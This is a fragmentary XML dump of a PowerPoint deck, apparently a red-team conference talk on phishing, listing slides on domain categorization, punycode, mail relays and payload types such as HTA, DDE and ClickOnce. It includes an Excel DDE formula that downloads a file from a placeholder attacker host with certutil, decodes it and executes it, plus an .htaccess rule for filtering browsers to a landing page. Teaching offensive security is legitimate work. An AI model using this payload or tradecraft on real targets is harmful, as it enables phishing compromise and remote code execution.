            </a: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HTA executes without the the constraints of the internet browser security model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 to create applications requiring only an additional header to differentiate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Runs with same process model as IE, in different process though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- Dynamic Data Exchange</a:t>
            </a:r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 Word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Patch pushed December of 2017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HKEY_CURRENT_USER\Software\Microsoft\Office\&lt;version#&gt;\Word\Security\AllowDDE = 0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 Excel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=MSEXCEL|'..\..\..\..\..\..\..\windows\\system32\cmd.exe /c certutil -urlcache -split -split -f http://ATTACKERIP/testpoc64.txt %appdata%\testpoc64.txt &amp;&amp; certutil -decode %appdata%\testpoc64.txt %appdata%\testpoc.hta &amp;&amp; %appdata%\testpoc.hta'!A0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 Publisher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Bypass potential Excel DDE mitigations via registry modification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1" name="Shape 421" title="DDE Po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850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- ClickOnce Application </a:t>
            </a:r>
            <a:endParaRPr/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427250" y="167667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Component of .NET Framework 2.0 and later</a:t>
            </a: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“Core principle is to ease the installation of Windows applications”</a:t>
            </a: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focus is to update applications easily </a:t>
            </a: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Deployed in an expedited manner with IE and MS Edge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- ClickOnce Application </a:t>
            </a:r>
            <a:endParaRPr/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50" y="1371875"/>
            <a:ext cx="6911932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- ClickOnce Application </a:t>
            </a:r>
            <a:endParaRPr/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850" y="1286700"/>
            <a:ext cx="6577267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- ClickOnce Application </a:t>
            </a:r>
            <a:endParaRPr/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700" y="1276825"/>
            <a:ext cx="6549939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- ClickOnce Application </a:t>
            </a:r>
            <a:endParaRPr/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925" y="1286700"/>
            <a:ext cx="6568134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favor has shifted</a:t>
            </a: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Shape 105" descr="https://fthmb.tqn.com/eIZUsNeRGGk7gm0JAOCHi11ncek=/960x0/filters:no_upscale():max_bytes(150000):strip_icc()/cat-playing-with-little-gerbil-mouse-on-thetable-507209918-5aa963921f4e1300371a309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350" y="1361200"/>
            <a:ext cx="4811287" cy="320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Payloads - ClickOnce Application </a:t>
            </a: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504950" y="1456150"/>
            <a:ext cx="6576300" cy="2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.htaccess for Apache mod_rewrite to redirect non-IE browsers to a landing page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RewriteEngine On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RewriteCond %{HTTP_USER_AGENT} !(Trident|MSIE|^$) [NC]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RewriteCond %{REQUEST_URI} !(\.png|unsupported.html)$ [NC]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RewriteRule ^.*$ /unsupported.html [L]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sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Shape 463"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531900" y="1584350"/>
            <a:ext cx="50133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Slides will be here</a:t>
            </a:r>
            <a:endParaRPr sz="18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https://github.com/kafkaesqu3/presentation-material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up with the curve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00" y="1489825"/>
            <a:ext cx="3164875" cy="3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725" y="1489825"/>
            <a:ext cx="3515581" cy="3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Office365 Advanced Threat Protection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="119" name="Shape 119" descr="https://c.s-microsoft.com/en-us/CMSImages/Image_SecureMailboxes_713x261.png?version=cc73da43-6872-4c0c-7b16-b70a2b8a6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8210724" cy="30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Acquiring your target/pretext (OSINT)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99" y="1489825"/>
            <a:ext cx="2201275" cy="36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951" y="1489825"/>
            <a:ext cx="2201275" cy="36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9075" y="1489825"/>
            <a:ext cx="2269325" cy="36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Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>238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Source Code Pro</vt:lpstr>
      <vt:lpstr>Roboto Slab</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Marina</vt:lpstr>
      <vt:lpstr>Current State of Phishing</vt:lpstr>
      <vt:lpstr>whoami.jpg.exe      Nick “memelord” Powers</vt:lpstr>
      <vt:lpstr>David_Tulis.doc.exe</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>How the game has changed</vt:lpstr>
      <vt:lpstr>The favor has shifted</vt:lpstr>
      <vt:lpstr>Keeping up with the curve</vt:lpstr>
      <vt:lpstr>Office365 Advanced Threat Protection</vt:lpstr>
      <vt:lpstr>Acquiring your target/pretext (OSINT)</vt:lpstr>
      <vt:lpstr>Domain Categorization</vt:lpstr>
      <vt:lpstr>Check your categorization here!</vt:lpstr>
      <vt:lpstr>...or get it categorized yourself</vt:lpstr>
      <vt:lpstr>expireddomains.net </vt:lpstr>
      <vt:lpstr>expireddomains.net </vt:lpstr>
      <vt:lpstr>expireddomains.net </vt:lpstr>
      <vt:lpstr>expireddomains.net </vt:lpstr>
      <vt:lpstr>Categorized as Business/ Economy</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Tricking the user </vt:lpstr>
      <vt:lpstr>Punycoded Internationalized Domain Names (IDNs) </vt:lpstr>
      <vt:lpstr>Punycoding and Why It’s Relevant </vt:lpstr>
      <vt:lpstr>Configuring the mail server</vt:lpstr>
      <vt:lpstr>Infrastructure requirements</vt:lpstr>
      <vt:lpstr>Backend phishing server</vt:lpstr>
      <vt:lpstr>Intermediary SMTP redirector</vt:lpstr>
      <vt:lpstr>3rd party relay</vt:lpstr>
      <vt:lpstr>Test your mail server’s legitimacy </vt:lpstr>
      <vt:lpstr>Sending the payload</vt:lpstr>
      <vt:lpstr>Payloads </vt:lpstr>
      <vt:lpstr>What to execute</vt:lpstr>
      <vt:lpstr>Pre-phish</vt:lpstr>
      <vt:lpstr>How to execute - Wscript.Shell</vt:lpstr>
      <vt:lpstr>WMI Win32_ProcessStartup and Win32_Process</vt:lpstr>
      <vt:lpstr>WMI Win32_ProcessStartup and Win32_Process</vt:lpstr>
      <vt:lpstr>WMI Win32_ProcessStartup and Win32_Process</vt:lpstr>
      <vt:lpstr>Or without powershell.exe</vt:lpstr>
      <vt:lpstr>Or without powershell.exe</vt:lpstr>
      <vt:lpstr>DotNetToJScript</vt:lpstr>
      <vt:lpstr>DotNetToJScript</vt:lpstr>
      <vt:lpstr>Powershell payload</vt:lpstr>
      <vt:lpstr>Powershell payload</vt:lpstr>
      <vt:lpstr>DotNetToJScript</vt:lpstr>
      <vt:lpstr>DotNetToJScript</vt:lpstr>
      <vt:lpstr>DotNetToJScript</vt:lpstr>
      <vt:lpstr>Macro obfuscation</vt:lpstr>
      <vt:lpstr>Additional payload protections</vt:lpstr>
      <vt:lpstr>When SMB can egress from the network </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SMB Egress Testing  </vt:lpstr>
      <vt:lpstr>SMB Egress Testing (cont.) </vt:lpstr>
      <vt:lpstr>Payloads - HTML Application (HTA)</vt:lpstr>
      <vt:lpstr>Payloads - Dynamic Data Exchange</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Payloads - ClickOnce Application </vt:lpstr>
      <vt:lpstr>Payloads - ClickOnce Application </vt:lpstr>
      <vt:lpstr>Payloads - ClickOnce Application </vt:lpstr>
      <vt:lpstr>Payloads - ClickOnce Application </vt:lpstr>
      <vt:lpstr>Payloads - ClickOnce Application </vt:lpstr>
      <vt:lpstr>Payloads - ClickOnce Application </vt:lpstr>
      <vt:lpstr>Thanks for listening!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2018-05-05T18:03:19Z</dcterms:modified>
</cp:coreProperties>
</file>